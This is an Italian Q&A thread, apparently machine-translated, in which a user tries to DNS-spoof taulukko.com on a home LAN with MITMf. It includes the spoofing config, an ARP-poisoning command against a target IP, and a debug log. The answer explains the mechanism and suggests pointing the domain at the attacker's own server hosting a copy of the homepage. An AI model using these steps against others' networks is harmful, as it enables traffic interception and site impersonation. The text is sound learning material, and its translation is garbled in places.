cercando di dns spoof usando mitmf

0

Sto provando a reindirizzare una pagina di taulukko.com a google.com per scopi di apprendimento, ma senza successo.

Quando accedo a taulukko.com dal nodo di spoofing ricevo:

The webpage cannot be found

my mitmf.conf:

#Supported formats are 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
        #can also be a comma seperated list e.g 8.8.8.8,8.8.4.4
        #
        nameservers = 8.8.8.8

        [[[A]]]     # Queries for IPv4 address records
        #*.thesprawls.org=192.0.2.1
        *.taulukko.com=201.55.233.116

        [[[AAAA]]]  # Queries for IPv6 address records
        *.thesprawl.org=2001:db8::1

        [[[MX]]]    # Queries for mail server records
        *.thesprawl.org=mail.fake.com

        [[[NS]]]    # Queries for mail server records
        *.thesprawl.org=ns.fake.com

        [[[CNAME]]] # Queries for alias records
        *.thesprawl.org=www.fake.com

        [[[TXT]]]   # Queries for text records
        *.thesprawl.org=fake message

        [[[PTR]]]   # PTR queries
        *.2.0.192.in-addr.arpa=fake.com

        [[[SOA]]] #FORMAT: mname rname t1 t2 t3 t4 t5
        *.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600

        [[[NAPTR]]] #FORMAT: order preference flags service regexp replacement
        *.thesprawl.org=100 10 U E2U+sip !^.*$!sip:[email protected]! .

        [[[SRV]]] #FORMAT: priority weight port target
        *.*.thesprawl.org=0 5 5060 sipserver.fake.com

il comando:

mitmf -i wlan0 --spoof --arp --dns --gateway 192.168.0.1 --target 192.168.0.16 --log debug

il debug:

2016-02-20 18:05:47 [Utils] Setting iptables DNS redirection rule from port 53 to 53
2016-02-20 18:05:47 [Utils] Setting ip forwarding to 1
2016-02-20 18:05:47 [Utils] Flushing iptables
2016-02-20 18:05:47 [Utils] Setting iptables HTTP redirection rule from port 80 to 10000
2016-02-20 18:05:47 [ARPpoisoner] gatewayip  => 192.168.0.1
2016-02-20 18:05:47 [ARPpoisoner] gatewaymac => X:X:X:X:X:X
2016-02-20 18:05:47 [ARPpoisoner] targets    => ['192.168.0.16']
2016-02-20 18:05:47 [ARPpoisoner] targetmac  => None
2016-02-20 18:05:47 [ARPpoisoner] mymac      => X:X:X:X:X:X
2016-02-20 18:05:47 [ARPpoisoner] interface  => wlan0
2016-02-20 18:05:47 [ARPpoisoner] arpmode    => rep
2016-02-20 18:05:47 [ARPpoisoner] interval   => 3
2016-02-20 18:05:47 [ProxyPlugins] Adding Spoof plugin
2016-02-20 18:05:47 [SMBserver] Config file parsed
2016-02-20 18:05:47 [SMBserver] Callback added for UUID X-X-X-X-X V:3.0
2016-02-20 18:05:47 [SMBserver] Config file parsed
2016-02-20 18:05:49 [ClientRequest] Resolving host: www.taulukko.com
2016-02-20 18:05:49 [ClientRequest] Host not cached.
2016-02-20 18:05:49 [ClientRequest] Resolving with DNSChef
2016-02-20 18:05:49 [ClientRequest] Resolved host successfully: www.taulukko.com -> 201.55.233.116
2016-02-20 18:05:49 [ClientRequest] Zapped encoding
2016-02-20 18:05:49 [ClientRequest] Sending request via HTTP
2016-02-20 18:05:49 [ServerConnection] HTTP connection made.
2016-02-20 18:05:49 [ProxyPlugins] hooking connectionMade()
2016-02-20 18:05:49 192.168.0.16 [type:IE 8.0 os:Windows 7] Sending Request: www.taulukko.com
2016-02-20 18:05:49 [ServerConnection] Full request: www.taulukko.com/
2016-02-20 18:05:49 [ServerConnection] Sending header: (host: www.taulukko.com)
2016-02-20 18:05:49 [ServerConnection] Sending header: (accept-language: en-US)
2016-02-20 18:05:49 [ServerConnection] Sending header: (connection: Keep-Alive)
2016-02-20 18:05:49 [ServerConnection] Sending header: (accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*)
2016-02-20 18:05:49 [ServerConnection] Sending header: (user-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0))
2016-02-20 18:05:49 [ServerConnection] Server response: HTTP/1.0 404 Not Found
2016-02-20 18:05:49 [ProxyPlugins] hooking handleEndHeaders()
2016-02-20 18:05:49 [ServerConnection] Receiving header: (x-xss-protection: 1; mode=block)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (server: HTTP server (unknown))
2016-02-20 18:05:49 [ServerConnection] Receiving header: (connection: Keep-Alive)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (date: Sat, 20 Feb 2016 20:05:49 GMT)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (x-frame-options: SAMEORIGIN)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (content-type: text/html)
2016-02-20 18:05:49 [ProxyPlugins] hooking handleResponse()
2016-02-20 18:05:49 [ServerConnection] Read from server 49 bytes of data
2016-02-20 18:05:54 [ARPpoisoner] Restoring connection 192.168.0.16 <-> 192.168.0.1 with 2 packets per host
2016-02-20 18:05:54 [Utils] Flushing iptables
2016-02-20 18:05:54 [Utils] Setting ip forwarding to 0
    
posta gui_cc2015 20.02.2016 - 21:17
fonte

1 risposta

1

Dns-spoof non è reindirizzamento.

In questo caso mitm ogni volta che la vittima non conosce l'IP di taulakku.com invierà query DNS. E in cambio otterrà l'IP corrispondente dal server DNS.

In dnsspoof L'attaccante inonderà la vittima con la sua risposta DNS creata.

Quindi ora ogni volta che la vittima chiede l'IP di taulukko, riconosce le risposte DNS predisposte.

Esempio: se gli autori di attacchi dnsspoof's taulukko's ip su IP di Google.

Le domande dacker di attacco dicono che l'indirizzo IP di taulukko.com è (ip di google). Così ora la vittima chiede la pagina web taulukko.com da google ip.

Che non è presente (controlla l'intestazione http). Quindi non trovi la pagina web.

Soluzione ora: Dnspoof taulukko.com al tuo IP ed esegui il tuo server con la homepage di taulakku. La vittima ottiene la tua pagina non quella originale di taulukko  homepage. (Controlla i pacchetti in wireshark per verificare tutto) : -)

Buon link per dnsspoof

    
risposta data 21.02.2016 - 08:22
fonte

Leggi altre domande sui tag